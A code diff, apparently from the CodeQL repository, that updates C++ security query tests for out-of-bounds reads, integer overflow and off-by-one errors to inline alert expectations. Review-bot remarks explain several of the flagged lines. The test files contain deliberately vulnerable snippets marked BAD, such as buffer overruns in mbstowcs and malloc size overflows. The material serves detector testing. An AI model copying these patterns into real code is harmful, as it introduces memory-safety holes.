diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test.cpp index b4f0830039d8..9c5f15048fef 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test.cpp @@ -63,7 +63,7 @@ static void badTest1(const char* ptr) int ret; int len; len = strlen(ptr); - for (wchar_t wc; (ret = mbtowc(&wc, ptr, 4)) > 0; len-=ret) { // BAD:we can get unpredictable results + for (wchar_t wc; (ret = mbtowc(&wc, ptr, 4)) > 0; len-=ret) { // BAD:we can get unpredictable results // $ Alert wprintf(L"%lc", wc); ptr += ret; } @@ -73,7 +73,7 @@ static void badTest2(const char* ptr) int ret; int len; len = strlen(ptr); - for (wchar_t wc; (ret = mbtowc(&wc, ptr, sizeof(wchar_t))) > 0; len-=ret) { // BAD:we can get unpredictable results + for (wchar_t wc; (ret = mbtowc(&wc, ptr, sizeof(wchar_t))) > 0; len-=ret) { // BAD:we can get unpredictable results // $ Alert wprintf(L"%lc", wc); ptr += ret; } @@ -103,7 +103,7 @@ static void badTest3(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && len > 0) { - ret = mbtowc(wc, ptr, MB_CUR_MAX); // BAD + ret = mbtowc(wc, ptr, MB_CUR_MAX); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) @@ -120,7 +120,7 @@ static void badTest4(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && len > 0) { - ret = mbtowc(wc, ptr, 16); // BAD + ret = mbtowc(wc, ptr, 16); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) @@ -137,7 +137,7 @@ static void badTest5(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && len > 0) { - ret = mbtowc(wc, ptr, sizeof(wchar_t)); // BAD + ret = mbtowc(wc, ptr, sizeof(wchar_t)); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) 
@@ -155,7 +155,7 @@ static void badTest6(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && wc_len > 0) { - ret = mbtowc(wc, ptr, wc_len); // BAD + ret = mbtowc(wc, ptr, wc_len); // BAD // $ Alert if (ret <0) if (checkErrors()) { ++ptr; @@ -178,7 +178,7 @@ static void badTest7(const char* ptr,int wc_len) len = wc_len; wchar_t *wc = new wchar_t[wc_len]; while (*ptr && wc_len > 0) { - ret = mbtowc(wc, ptr, len); // BAD + ret = mbtowc(wc, ptr, len); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) @@ -194,7 +194,7 @@ static void badTest8(const char* ptr,wchar_t *wc) int len; len = strlen(ptr); while (*ptr && len > 0) { - ret = mbtowc(wc, ptr, len); // BAD + ret = mbtowc(wc, ptr, len); // BAD // $ Alert if (ret <0) break; if (ret == 0 || ret > len) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test1.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test1.cpp index d66f36d38b97..40916f0c4b75 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test1.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test1.cpp @@ -25,8 +25,8 @@ void* calloc (size_t num, size_t size); void* malloc (size_t size); static void badTest1(void *src, int size) { - WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, (LPSTR)src, size, 0, 0); // BAD - MultiByteToWideChar(CP_ACP, 0, (LPCSTR)src, -1, (LPCWSTR)src, 30); // BAD + WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, (LPSTR)src, size, 0, 0); // BAD // $ Alert + MultiByteToWideChar(CP_ACP, 0, (LPCSTR)src, -1, (LPCWSTR)src, 30); // BAD // $ Alert } void goodTest2(){ wchar_t src[] = L"0123456789ABCDEF"; 
@@ -42,7 +42,7 @@ void goodTest2(){ static void badTest2(){ wchar_t src[] = L"0123456789ABCDEF"; char dst[16]; - WideCharToMultiByte(CP_UTF8, 0, src, -1, dst, 16, NULL, NULL); // BAD + WideCharToMultiByte(CP_UTF8, 0, src, -1, dst, 16, NULL, NULL); // BAD // $ Alert printf("%s\n", dst); } static void goodTest3(){ @@ -55,7 +55,7 @@ static void badTest3(){ char src[] = "0123456789ABCDEF"; int size = MultiByteToWideChar(CP_UTF8, 0, src,sizeof(src),NULL,0); wchar_t * dst = (wchar_t*)calloc(size + 1, 1); - MultiByteToWideChar(CP_UTF8, 0, src, -1, dst, size+1); // BAD + MultiByteToWideChar(CP_UTF8, 0, src, -1, dst, size+1); // BAD // $ Alert } static void goodTest4(){ char src[] = "0123456789ABCDEF"; @@ -67,13 +67,13 @@ static void badTest4(){ char src[] = "0123456789ABCDEF"; int size = MultiByteToWideChar(CP_UTF8, 0, src,sizeof(src),NULL,0); wchar_t * dst = (wchar_t*)malloc(size + 1); - MultiByteToWideChar(CP_UTF8, 0, src, -1, dst, size+1); // BAD + MultiByteToWideChar(CP_UTF8, 0, src, -1, dst, size+1); // BAD // $ Alert } static int goodTest5(void *src){ return WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, 0, 0, 0, 0); // GOOD } static int badTest5 (void *src) { - return WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, 0, 3, 0, 0); // BAD + return WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)src, -1, 0, 3, 0, 0); // BAD // $ Alert } static void goodTest6(WCHAR *src) { @@ -90,6 +90,6 @@ static void goodTest6(WCHAR *src) static void badTest6(WCHAR *src) { char dst[5] =""; - WideCharToMultiByte(CP_ACP, 0, src, -1, dst, 260, 0, 0); // BAD + WideCharToMultiByte(CP_ACP, 0, src, -1, dst, 260, 0, 0); // BAD // $ Alert printf("%s\n", dst); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test2.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test2.cpp index 65e5a9ee275f..07bf78f5f3d9 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test2.cpp 
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test2.cpp @@ -12,11 +12,11 @@ size_t mbsrtowcs(wchar_t *wcstr,const char *mbstr,size_t count, mbstate_t *mbsta static void badTest1(void *src, int size) { - mbstowcs((wchar_t*)src,(char*)src,size); // BAD + mbstowcs((wchar_t*)src,(char*)src,size); // BAD // $ Alert _locale_t locale; - _mbstowcs_l((wchar_t*)src,(char*)src,size,locale); // BAD + _mbstowcs_l((wchar_t*)src,(char*)src,size,locale); // BAD // $ Alert mbstate_t *mbstate; - mbsrtowcs((wchar_t*)src,(char*)src,size,mbstate); // BAD + mbsrtowcs((wchar_t*)src,(char*)src,size,mbstate); // BAD // $ Alert } static void goodTest2(){ char src[] = "0123456789ABCDEF"; @@ -32,7 +32,7 @@ static void goodTest2(){ static void badTest2(){ char src[] = "0123456789ABCDEF"; wchar_t dst[16]; - mbstowcs(dst, src,16); // BAD + mbstowcs(dst, src,16); // BAD // $ Alert printf("%s\n", dst); } static void goodTest3(){ @@ -45,7 +45,7 @@ static void badTest3(){ char src[] = "0123456789ABCDEF"; int size = mbstowcs(NULL, src,NULL); wchar_t * dst = (wchar_t*)calloc(size + 1, 1); - mbstowcs(dst, src,size+1); // BAD + mbstowcs(dst, src,size+1); // BAD // $ Alert } static void goodTest4(){ char src[] = "0123456789ABCDEF"; @@ -57,13 +57,13 @@ static void badTest4(){ char src[] = "0123456789ABCDEF"; int size = mbstowcs(NULL, src,NULL); wchar_t * dst = (wchar_t*)malloc(size + 1); - mbstowcs(dst, src,size+1); // BAD + mbstowcs(dst, src,size+1); // BAD // $ Alert } static int goodTest5(void *src){ return mbstowcs(NULL, (char*)src,NULL); // GOOD } static int badTest5 (void *src) { - return mbstowcs(NULL, (char*)src,3); // BAD + return mbstowcs(NULL, (char*)src,3); // BAD // $ Alert } static void goodTest6(void *src){ wchar_t dst[5]; @@ -77,6 +77,6 @@ static void goodTest6(void *src){ } static void badTest6(void *src){ wchar_t dst[5]; - mbstowcs(dst, (char*)src,260); // BAD + mbstowcs(dst, (char*)src,260); // BAD // $ Alert printf("%s\n", dst); } 
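Review bot: The annotated `mbstowcs(dst, src,size+1);` calls in `badTest3` and `badTest4` carry only a bare `// BAD`, so the reason the new `// $ Alert` expectation is correct is left for the reader to work out. In both functions `dst` is allocated as `size + 1` bytes (`calloc(size + 1, 1)` and `malloc(size + 1)`), while the third argument of `mbstowcs` counts wide characters, so the conversion can write past the allocation; presumably that mismatch is what the query reports. I would state it next to the annotation, for example `// BAD: dst holds size+1 bytes, but the count is in wchar_t units // $ Alert`.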
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test3.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test3.cpp index 662cdfc7be81..4ac5ce29fc66 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test3.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-125/semmle/tests/test3.cpp @@ -13,7 +13,7 @@ static size_t badTest1(unsigned char *src){ int cb = 0; unsigned char dst[50]; while( cb < sizeof(dst) ) - dst[cb++]=*src++; // BAD + dst[cb++]=*src++; // BAD // $ Alert return _mbclen(dst); } static void goodTest2(unsigned char *src){ @@ -33,7 +33,7 @@ static void badTest2(unsigned char *src){ unsigned char dst[50]; while( cb < sizeof(dst) ) { - _mbccpy(dst+cb,src); // BAD + _mbccpy(dst+cb,src); // BAD // $ Alert cb+=_mbclen(src); src=_mbsinc(src); } @@ -44,5 +44,5 @@ static void goodTest3(){ } static void badTest3(){ wchar_t name[50]; - name[sizeof(name) - 1] = L'\0'; // BAD + name[sizeof(name) - 1] = L'\0'; // BAD // $ Alert } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected index c55008f6550c..2d714cac53e6 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.expected 
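Review bot: In `badTest3` the annotated line `name[sizeof(name) - 1] = L'\0';` is documented only as `// BAD`, which hides why an alert is expected there. `sizeof(name)` is the array's size in bytes rather than its element count, so for `wchar_t name[50]` the index lies beyond the last element wherever `wchar_t` is wider than one byte. A comment such as `// BAD: sizeof(name) is a byte count, not the number of wchar_t elements // $ Alert` would make the case self-explanatory. The body of `goodTest3` is outside the hunk, so I cannot tell whether it already shows the element-count form.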
@@ -1,3 +1,13 @@ +#select +| test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:13:33:13:37 | ... * ... | multiplication | +| test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:15:31:15:35 | ... * ... | multiplication | +| test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:19:34:19:38 | ... * ... | multiplication | +| test.cpp:23:33:23:37 | size1 | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:22:17:22:21 | ... * ... | multiplication | +| test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:30:18:30:32 | ... * ... | multiplication | +| test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:31:18:31:32 | ... * ... | multiplication | +| test.cpp:37:46:37:49 | size | test.cpp:45:36:45:40 | ... * ... | test.cpp:37:46:37:49 | size | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | +| test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | +| test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... 
| test.cpp:46:36:46:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:46:36:46:40 | ... * ... | multiplication | edges | test.cpp:22:17:22:21 | ... * ... | test.cpp:22:17:22:21 | ... * ... | provenance | | | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | provenance | | 
@@ -18,13 +28,3 @@ nodes | test.cpp:45:36:45:40 | ... * ... | semmle.label | ... * ... | | test.cpp:46:36:46:40 | ... * ... | semmle.label | ... * ... | subpaths -#select -| test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | test.cpp:13:33:13:37 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:13:33:13:37 | ... * ... | multiplication | -| test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | test.cpp:15:31:15:35 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:15:31:15:35 | ... * ... | multiplication | -| test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | test.cpp:19:34:19:38 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:19:34:19:38 | ... * ... | multiplication | -| test.cpp:23:33:23:37 | size1 | test.cpp:22:17:22:21 | ... * ... | test.cpp:23:33:23:37 | size1 | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:22:17:22:21 | ... * ... | multiplication | -| test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | test.cpp:30:18:30:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:30:18:30:32 | ... * ... | multiplication | -| test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | test.cpp:31:18:31:32 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:31:18:31:32 | ... * ... | multiplication | -| test.cpp:37:46:37:49 | size | test.cpp:45:36:45:40 | ... * ... | test.cpp:37:46:37:49 | size | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | -| test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... | test.cpp:45:36:45:40 | ... * ... 
| Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:45:36:45:40 | ... * ... | multiplication | -| test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | test.cpp:46:36:46:40 | ... * ... | Potentially overflowing value from $@ is used in the size of this allocation. | test.cpp:46:36:46:40 | ... * ... | multiplication | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.qlref index 7bb108b66280..fc48bdd1c2b3 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/AllocMultiplicationOverflow.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-190/AllocMultiplicationOverflow.ql +query: experimental/Security/CWE/CWE-190/AllocMultiplicationOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/test.cpp index 3f49ebdece6f..63044b1a3a97 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/AllocMultiplicationOverflow/test.cpp 
@@ -10,31 +10,31 @@ void test() int y = getAnInt(); char *buffer1 = (char *)malloc(x + y); // GOOD - char *buffer2 = (char *)malloc(x * y); // BAD + char *buffer2 = (char *)malloc(x * y); // BAD // $ Alert int *buffer3 = (int *)malloc(x * sizeof(int)); // GOOD - int *buffer4 = (int *)malloc(x * y * sizeof(int)); // BAD + int *buffer4 = (int *)malloc(x * y * sizeof(int)); // BAD // $ Alert if ((x <= 1000) && (y <= 1000)) { - char *buffer5 = (char *)malloc(x * y); // GOOD [FALSE POSITIVE] + char *buffer5 = (char *)malloc(x * y); // GOOD [FALSE POSITIVE] // $ Alert } - size_t size1 = x * y; - char *buffer5 = (char *)malloc(size1); // BAD + size_t size1 = x * y; // $ Source + char *buffer5 = (char *)malloc(size1); // BAD // $ Alert size_t size2 = x; size2 *= y; char *buffer6 = (char *)malloc(size2); // BAD [NOT DETECTED] char *buffer7 = new char[x * 10]; // GOOD - char *buffer8 = new char[x * y]; // BAD - char *buffer9 = new char[x * x]; // BAD + char *buffer8 = new char[x * y]; // BAD // $ Alert + char *buffer9 = new char[x * x]; // BAD // $ Alert } // --- custom allocators --- -void *MyMalloc1(size_t size) { return malloc(size); } // [additional detection here] +void *MyMalloc1(size_t size) { return malloc(size); } // [additional detection here] // $ Alert void *MyMalloc2(size_t size); void customAllocatorTests() @@ -42,6 +42,6 @@ void customAllocatorTests() int x = getAnInt(); int y = getAnInt(); - char *buffer1 = (char *)MyMalloc1(x * y); // BAD - char *buffer2 = (char *)MyMalloc2(x * y); // BAD + char *buffer1 = (char *)MyMalloc1(x * y); // BAD // $ Alert Source + char *buffer2 = (char *)MyMalloc2(x * y); // BAD // $ Alert } 
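Review bot: The `buffer5` allocation guarded by `(x <= 1000) && (y <= 1000)` is commented `GOOD [FALSE POSITIVE]` but gets a plain `// $ Alert`, which records the known false positive as an ordinary expected result. The inline-expectations format has a prefix for this case, so the line would read `// GOOD [FALSE POSITIVE] // $ SPURIOUS: Alert`. Likewise the `malloc(size2)` line marked `BAD [NOT DETECTED]`, an unchanged context line in this hunk, would carry `// $ MISSING: Alert`. With both prefixes in place, the over-report and the missed `size2 *= y` overflow stay visible in the test when the query's precision changes. test() begins before the hunk, so the declarations of `x` and `getAnInt` are not visible here.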
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/DangerousUseOfTransformationAfterOperation.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/DangerousUseOfTransformationAfterOperation.qlref
index 84f717acda79..ec83c625619a 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/DangerousUseOfTransformationAfterOperation.qlref
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/DangerousUseOfTransformationAfterOperation.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation.ql
+query: experimental/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/test.cpp
index 472c8ac0afac..ab4d7f4c2e77 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/test.cpp
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/DangerousUseOfTransformationAfterOperation/test.cpp
@@ -6,17 +6,17 @@ void functionWork(char aA[10],unsigned int aUI) { int aI; aI = (aUI*8)/10; // GOOD - aI = aUI*8; // BAD + aI = aUI*8; // BAD // $ Alert aP = aA+aI; aI = (int)aUI*8; // GOOD - aL = (unsigned long)(aI*aI); // BAD + aL = (unsigned long)(aI*aI); // BAD // $ Alert aL = ((unsigned long)aI*aI); // GOOD - testCall((unsigned long)(aI*aI)); // BAD + testCall((unsigned long)(aI*aI)); // BAD // $ Alert testCall(((unsigned long)aI*aI)); // GOOD - if((unsigned long)(aI*aI) > aL) // BAD + if((unsigned long)(aI*aI) > aL) // BAD // $ Alert return; if(((unsigned long)aI*aI) > aL) // GOOD return; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/IfStatementAdditionOverflow.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/IfStatementAdditionOverflow.qlref index 0873051581d9..2a390e2a518b 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/IfStatementAdditionOverflow.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/IfStatementAdditionOverflow.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-190/IfStatementAdditionOverflow.ql +query: experimental/Security/CWE/CWE-190/IfStatementAdditionOverflow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/test.cpp index 7c5ab91832e4..4734e1bba8d4 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-190/IfStatementAdditionOverflow/test.cpp 
@@ -15,49 +15,49 @@ void test() unsigned short b1 = getAnUnsignedShort(); unsigned short c1 = getAnUnsignedShort(); - if (a+b>c) a = c-b; // BAD - if (a+b>c) { a = c-b; } // BAD - if (b+a>c) a = c-b; // BAD - if (b+a>c) { a = c-b; } // BAD - if (c>a+b) a = c-b; // BAD - if (c>a+b) { a = c-b; } // BAD - if (c>b+a) a = c-b; // BAD - if (c>b+a) { a = c-b; } // BAD + if (a+b>c) a = c-b; // BAD // $ Alert + if (a+b>c) { a = c-b; } // BAD // $ Alert + if (b+a>c) a = c-b; // BAD // $ Alert + if (b+a>c) { a = c-b; } // BAD // $ Alert + if (c>a+b) a = c-b; // BAD // $ Alert + if (c>a+b) { a = c-b; } // BAD // $ Alert + if (c>b+a) a = c-b; // BAD // $ Alert + if (c>b+a) { a = c-b; } // BAD // $ Alert - if (a+b>=c) a = c-b; // BAD - if (a+b>=c) { a = c-b; } // BAD - if (b+a>=c) a = c-b; // BAD - if (b+a>=c) { a = c-b; } // BAD - if (c>=a+b) a = c-b; // BAD - if (c>=a+b) { a = c-b; } // BAD - if (c>=b+a) a = c-b; // BAD - if (c>=b+a) { a = c-b; } // BAD + if (a+b>=c) a = c-b; // BAD // $ Alert + if (a+b>=c) { a = c-b; } // BAD // $ Alert + if (b+a>=c) a = c-b; // BAD // $ Alert + if (b+a>=c) { a = c-b; } // BAD // $ Alert + if (c>=a+b) a = c-b; // BAD // $ Alert + if (c>=a+b) { a = c-b; } // BAD // $ Alert + if (c>=b+a) a = c-b; // BAD // $ Alert + if (c>=b+a) { a = c-b; } // BAD // $ Alert - if (a+bd) a = d-b; // BAD + if (a+b>d) a = d-b; // BAD // $ Alert if (a+(double)b>c) a = c-b; // GOOD if (a+(-x)>c) a = c-(-y); // GOOD if (a+b>c) { b++; a = c-b; } // GOOD if (a+d>c) a = c-d; // GOOD if (a1+b1>c1) a1 = c1-b1; // GOOD - if (a+b<=c) { /* ... */ } else { a = c-b; } // BAD - if (a+b<=c) { return; } a = c-b; // BAD + if (a+b<=c) { /* ... */ } else { a = c-b; } // BAD // $ Alert + if (a+b<=c) { return; } a = c-b; // BAD // $ Alert } 
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected index b343a4b47ede..ec17b2bd2f4a 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.expected 
@@ -1,3 +1,22 @@ +#select +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:5:25:5:28 | size | size | +| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:9:26:9:29 | size | size | +| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:30:29:30:32 | size | size | +| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:34:30:34:33 | size | size | +| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:40:29:40:32 | size | size | +| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. 
| test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:44:30:44:33 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:16:56:19 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:58:29:58:32 | size | size | +| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:62:30:62:33 | size | size | +| test.cpp:83:14:83:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:83:14:83:14 | p | Off-by one error allocated at $@ bounded by $@. 
